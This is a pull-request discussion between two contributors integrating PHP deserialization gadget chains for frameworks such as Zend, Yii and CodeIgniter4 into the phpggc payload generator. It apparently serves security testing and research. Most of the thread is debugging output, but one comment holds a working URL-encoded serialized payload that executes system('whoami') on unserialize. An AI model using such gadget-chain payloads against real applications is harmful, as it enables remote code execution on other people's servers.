add some gadget chains that I had collected

[CyanM0un]

Hi,
I sorted out a few gadget chains of some frameworks. I have manually checked all of them and some of them have passed the test-gc-compatibility script, which I have modified the corresponding version range in the chain.php.
It seems like no small work for both of us :)

[cfreal]

Hello CyanM0un,

That's amazing work ! I'll try and integrate it in the upcoming weeks, as you have said it is a lot of work :)

Charles

[cfreal]

Hello,

Still haven't had time to check this amazing work. Will do in the upcoming weeks !

[cfreal]

Hello,

I have started working on your GCs, CyanM0un. Every ZendFramework payloads works except for the FI1:

$ php7.1 /tools/web/php/phpggc/phpggc ZendFramework/FI1 --test-payload
Trying to deserialize payload...
PHP Warning:  Exception caught by form: Plugin by name '/tmp/phpggc110c813231d70d6d47e543bc48d27d69254966a5' was not found in the registry; used paths:
: 
Stack Trace:
#0 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(2709): Zend_Loader_PluginLoader->load('/tmp/phpggc110c...')
#1 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(3458): Zend_Form->_getDecorator('/tmp/phpggc110c...', 'options')
#2 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(2864): Zend_Form->_loadDecorator(Array, 'k')
#3 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(2992): Zend_Form->getDecorators()
#4 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(3010): Zend_Form->render()
#5 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Service/Twitter.php(263): Zend_Form->__toString()
#6 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(195): Zend_Service_Twitter->__call('detachLdap', Array)
#7 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(128) in /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php on line 3015
PHP Fatal error:  Uncaught Zend_Service_Twitter_Exception: Invalid method "detachldap" in /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Service/Twitter.php:266
Stack trace:
#0 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(195): Zend_Service_Twitter->__call('detachLdap', Array)
#1 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(128): Zend_Ldap_Node->detachLdap()
#2 [internal function]: Zend_Ldap_Node->__wakeup()
#3 /tools/web/php/phpggc/lib/test_payload.php(46): unserialize('O:14:"Zend_Ldap...')
#4 {main}
  thrown in /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Service/Twitter.php on line 266
FAILURE: Payload did not trigger !

Any ideas why ?

[CyanM0un]

Oh, in the last gadget class (Zend_Loader_PluginLoader), the function load will append a '.php' suffix to the file path, so '/tmp/phpggc110c813231d70d6d47e543bc48d27d69254966a5' may not be found.

[CyanM0un]

Oh, in the last gadget class (Zend_Loader_PluginLoader), the function load will append a '.php' suffix to the file path, so '/tmp/phpggc110c813231d70d6d47e543bc48d27d69254966a5' may not be found.

maybe we should specify that the chain only include arbitrary PHP file

[cfreal]

Ok, fixed for Zend. Yii2 GCs work as well. Now, Yii/RCE3 tries to use PHPUnit_Extensions_Selenium2TestCase_Session, which is NOT included in the Yii 1.1.20 distribution.

[CyanM0un]

I used the command composer create-project yiisoft/yii=1.1.20 yii1 to create the project for finding GCs. To be honest, I am a little confused about the difference and what the standard way may be. Kindly request your opinion :)

[cfreal]

Ok, I used the package present in their github repository.

Do you by any chance still have your vendor/composer/installed.json?
Now that I use your procedure, I get:

$ composer create-project yiisoft/yii=1.1.20 yii1
... blabla success
$ cd yii1
$ php7.4 /tools/web/php/phpggc/phpggc Yii/RCE3 --test-payload
Trying to deserialize payload...
PHP Fatal error:  Uncaught Error: Call to undefined method DocBlox_Parallel_Worker::curl() in /.../yii1/vendor/phpunit/phpunit-selenium/PHPUnit/Extensions/Selenium2TestCase/Session.php:194
Stack trace:
#0 /.../yii1/vendor/phpunit/phpunit-selenium/PHPUnit/Extensions/Selenium2TestCase/Session.php(173): PHPUnit_Extensions_Selenium2TestCase_Session->stop()
#1 [internal function]: PHPUnit_Extensions_Selenium2TestCase_Session->__destruct()
#2 {main}
  thrown in /.../yii1/vendor/phpunit/phpunit-selenium/PHPUnit/Extensions/Selenium2TestCase/Session.php on line 194
FAILURE: Payload did not trigger !

[CyanM0un]

I don't think that's the problem ... I test it right now using the package and it worked, eg:

<?php
include("./vendor/autoload.php");
include("./framework/YiiBase.php");
$poc = "O%3A11%3A%22CDbCriteria%22%3A1%3A%7Bs%3A6%3A%22params%22%3BO%3A12%3A%22CMapIterator%22%3A3%3A%7Bs%3A16%3A%22%00CMapIterator%00_d%22%3BO%3A5%3A%22CForm%22%3A1%3A%7Bs%3A16%3A%22%00CForm%00_elements%22%3BO%3A44%3A%22PHPUnit_Extensions_Selenium2TestCase_Session%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00commands%22%3Ba%3A1%3A%7Bs%3A6%3A%22itemAt%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A6%3A%22%00%2A%00url%22%3BO%3A40%3A%22PHPUnit_Extensions_Selenium2TestCase_URL%22%3A0%3A%7B%7Ds%3A9%3A%22%00%2A%00driver%22%3BO%3A23%3A%22DocBlox_Parallel_Worker%22%3A0%3A%7B%7D%7D%7Ds%3A19%3A%22%00CMapIterator%00_keys%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7Ds%3A18%3A%22%00CMapIterator%00_key%22%3Bs%3A6%3A%22whoami%22%3B%7D%7D";
unserialize(urldecode($poc)); // system('whoami')

the error was triggered in the PHPUnit_Extensions_Selenium2TestCase_Session#__destruct() progress, however the GC's function call should be triggered and finished in the CDbCriteria#__wakeup() progress, DocBlox_Parallel_Worker doesn't have the curl function because in the gadgets.php I simply pick up a class (DocBlox_Parallel_Worker) and assign it to the driver field of PHPUnit_Extensions_Selenium2TestCase_Session, which seems should not influence the command execution

[cfreal]

Ok, I was missing the YiiBase import :) Making progress!

[CyanM0un]

Ok, I was missing the YiiBase import :) Making progress!

Indeed a mount of work. 😂 Best respect for you

[cfreal]

Hello @CyanM0un !

I am back to process a few more GCs. In CI4, RCE7, you use \Symfony\Component\HttpFoundation\Request, which does not seem to be included in the standard distribution of the framework. I tried:

$ composer create-project codeigniter4/appstarter=4.1.3 hello123

and

$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip

Any ideas?

[cfreal]

Which package(s) are these versions for?

[CyanM0un]

it's https://github.com/laminas/laminas-http

[cfreal]

Fixed version here: it starts at 1.7.0

[CyanM0un]

thanks!

[cfreal]

Gelf\Message is not present.

[CyanM0un]

again by composer create-project monolog/monolog=2.0.0 monolog, in fact, a class that has the getTimestamp method will be ok

[cfreal]

Same: by default, create-projecŧ seems to include dev dependencies, while install does NOT.
We have generally refrained from including dev dependencies to GCs, as they are not often included.

[cfreal]

fixed 2.x-dev to 2.9.3+

[CyanM0un]

thanks a lot!

[cfreal]

Class missing after: composer require friendsofphp/php-cs-fixer=2.17.3

[CyanM0un]

still by composer create-project friendsofphp/php-cs-fixer=2.17.3 phpcsfixer. I want to clarify that I'm not really that familiar with php development myself, so I'm not quite sure what the differences are between these building ways.

[cfreal]

keradus is included as a require-dev dependency of php-cs-fixer, which is why I couldn't see it. It generally will not be present.

[cfreal]

Does not exist.

[CyanM0un]

maybe because the below reason or composer install?

[cfreal]

Does not work against any versions, and version 4.7.0 does not seem to exist? Last being 4.3.4

[CyanM0un]

sorry about the confusion, I used the framework https://github.com/popphp/popphp-framework

[cfreal]

composer require slim/slim:3.8.1 -> no prophecy

[CyanM0un]

the same reason for composer create-project slim/slim=3.8.1 slim

[cfreal]

Same, dev dep.

[cfreal]

Same

[CyanM0un]

same as above

[cfreal]

Same, dev dep.

[cfreal]

Uncaught Error: Invalid or uninitialized XMLWriter object in .../vendor/phpunit/php-code-coverage/src/Report/Xml/Coverage.php:62

[CyanM0un]

I am also confused, this gadget works well in my computer. In fact, look at the __construct code:

public function __construct(DOMElement $context, string $line) {
        $this->contextNode = $context;
        $this->writer = new XMLWriter;
        $this->writer->openMemory();
       ......
    }

I can't figure out how this will happen ...

[cfreal]

What's your PHP version? It looks like it is due to deserialisation.

[CyanM0un]

PHP 7.4.3 (cli) (built: Feb 18 2020 17:29:57) ( NTS Visual C++ 2017 x64 )

[CyanM0un]

Hello @CyanM0un !

I am back to process a few more GCs. In CI4, RCE7, you use \Symfony\Component\HttpFoundation\Request, which does not seem to be included in the standard distribution of the framework. I tried:

$ composer create-project codeigniter4/appstarter=4.1.3 hello123

and

$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip

Any ideas?

I used the second way, however, after I get the source code I usually use the command composer install to do the initialization, so \Symfony\Component\HttpFoundation\Request will be concluded.

[CyanM0un]

Finally, thank you very much for your continued contact. I also admire your work on Iconv, set the charset to RCE!
(Actually, all these gadget chains I have pulled requests were discovered by our automation tool. I personally think it works very well and I wonder if you could help promote it when we open-source it hahaha :)

[cfreal]

Hello @CyanM0un !
I am back to process a few more GCs. In CI4, RCE7, you use \Symfony\Component\HttpFoundation\Request, which does not seem to be included in the standard distribution of the framework. I tried:

$ composer create-project codeigniter4/appstarter=4.1.3 hello123

and

$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip

Any ideas?

I used the second way, however, after I get the source code I usually use the command composer install to do the initialization, so \Symfony\Component\HttpFoundation\Request will be concluded.

This is what I am doing, but still, it does not work:

$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip
$ unzip v4.1.3.zip
$ cd framework-4.1.3
$ composer install
$ phpggc CodeIgniter4/RCE7 --test-payload
Trying to deserialize payload...
PHP Fatal error:  Uncaught Error: Object of class __PHP_Incomplete_Class could not be converted to string in /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php:378
Stack trace:
#0 /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php(266): CodeIgniter\Session\Handlers\DatabaseHandler->releaseLock()
#1 /dev/shm/framework-4.1.3/system/Cache/Handlers/RedisHandler.php(70): CodeIgniter\Session\Handlers\DatabaseHandler->close()
#2 [internal function]: CodeIgniter\Cache\Handlers\RedisHandler->__destruct()
#3 {main}
  thrown in /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php on line 378
FAILURE: Payload did not trigger !

[CyanM0un]

Hello @CyanM0un !
I am back to process a few more GCs. In CI4, RCE7, you use \Symfony\Component\HttpFoundation\Request, which does not seem to be included in the standard distribution of the framework. I tried:

$ composer create-project codeigniter4/appstarter=4.1.3 hello123

and

$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip

Any ideas?

I used the second way, however, after I get the source code I usually use the command composer install to do the initialization, so \Symfony\Component\HttpFoundation\Request will be concluded.

This is what I am doing, but still, it does not work:

$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip
$ unzip v4.1.3.zip
$ cd framework-4.1.3
$ composer install
$ phpggc CodeIgniter4/RCE7 --test-payload
Trying to deserialize payload...
PHP Fatal error:  Uncaught Error: Object of class __PHP_Incomplete_Class could not be converted to string in /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php:378
Stack trace:
#0 /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php(266): CodeIgniter\Session\Handlers\DatabaseHandler->releaseLock()
#1 /dev/shm/framework-4.1.3/system/Cache/Handlers/RedisHandler.php(70): CodeIgniter\Session\Handlers\DatabaseHandler->close()
#2 [internal function]: CodeIgniter\Cache\Handlers\RedisHandler->__destruct()
#3 {main}
  thrown in /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php on line 378
FAILURE: Payload did not trigger !

sorry, my URL is https://github.com/codeigniter4/CodeIgniter4/archive/refs/tags/v4.1.3.zip